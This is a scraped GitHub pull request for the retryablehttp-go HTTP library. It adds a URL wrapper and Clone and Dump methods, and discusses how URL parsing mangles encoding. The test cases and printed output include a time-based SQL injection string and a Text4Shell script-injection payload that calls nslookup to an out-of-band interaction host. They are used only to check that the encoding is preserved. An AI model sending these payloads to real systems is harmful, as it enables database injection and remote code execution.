Skip to content

adds url wrapper to request#45

Merged
ehsandeep merged 2 commits intomainfrom
issue-44-url-wrapper
Jan 18, 2023
Merged

adds url wrapper to request#45
ehsandeep merged 2 commits intomainfrom
issue-44-url-wrapper

Conversation

@tarunKoyalwar
Copy link
Copy Markdown
Member

@tarunKoyalwar tarunKoyalwar commented Jan 17, 2023

Proposed Changes

  • adds urlutils.URL to Request and is abstracted
  • adds Clone() method to clone requests
  • adds Dump() method to Dump outgoing request in bytes

closes #44

@tarunKoyalwar
Copy link
Copy Markdown
Member Author

tarunKoyalwar commented Jan 17, 2023 

DEBUG=true go test -v ./...
=== RUN   TestRequest
....
=== RUN   TestRequestUrls
    request_test.go:30: 
        GET /?exploit=1+AND+(SELECT+*+FROM+(SELECT(SLEEP(12)))nQIP) HTTP/1.1
        Host: scanme.sh
        User-Agent: Go-http-client/1.1
        Accept-Encoding: gzip
        
        
    request_test.go:30: 
        GET /%2520test%250a HTTP/1.1
        Host: scanme.sh
        User-Agent: Go-http-client/1.1
        Accept-Encoding: gzip
        
        
    request_test.go:30: 
        GET /text4shell/attack?search=$%7bscript:javascript:java.lang.Runtime.getRuntime().exec('nslookup%20{{Host}}.{{Port}}.getparam.{{interactsh-url}}')%7d HTTP/1.1
        Host: scanme.sh
        User-Agent: Go-http-client/1.1
        Accept-Encoding: gzip
        
        
--- PASS: TestRequestUrls (0.00s)

@tarunKoyalwar
Copy link
Copy Markdown
Member Author

tarunKoyalwar commented Jan 17, 2023

@ehsandeep @Ice3man543

  • url encoding issues are caused due to url.Parse and while parsing url query parameters

  • URL introduced in utils acts like a hot patch and does not allow parameter encoding and is customizable

  • Earlier any special characters in path ex: %20test%0a used to be automatically discarded which is default behaviour of url.Parse but now we bypass it but only to a certain extent i.e http.Request internally does normalization so any special characters (i.e %) is encoded . (This only happens to path and not parameters)

  • There is no limitation in raw request though

  • Testcases in unit tests

    retryablehttp-go/request_test.go

    Lines 10 to 15 in 2816bac

    func TestRequestUrls(t *testing.T) {
    testcases := []string{
    "https://scanme.sh?exploit=1+AND+(SELECT+*+FROM+(SELECT(SLEEP(12)))nQIP)",
    "https://scanme.sh/%20test%0a",
    "https://scanme.sh/text4shell/attack?search=$%7bscript:javascript:java.lang.Runtime.getRuntime().exec('nslookup%20{{Host}}.{{Port}}.getparam.{{interactsh-url}}')%7d",
    }

@tarunKoyalwar tarunKoyalwar self-assigned this Jan 17, 2023
@tarunKoyalwar tarunKoyalwar added the enhancement New feature or request label Jan 17, 2023
@ehsandeep ehsandeep merged commit 2b396e4 into main Jan 18, 2023
@ehsandeep ehsandeep deleted the issue-44-url-wrapper branch January 18, 2023 07:04
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Reviewers

@ehsandeep ehsandeep ehsandeep approved these changes

@Ice3man543 Ice3man543 Ice3man543 approved these changes

Assignees

@tarunKoyalwar tarunKoyalwar

Labels

enhancement New feature or request

Projects

None yet

Milestone

No milestone

Development

Successfully merging this pull request may close these issues.

add url wrapper and helper methods to Request

3 participants

@tarunKoyalwar @ehsandeep @Ice3man543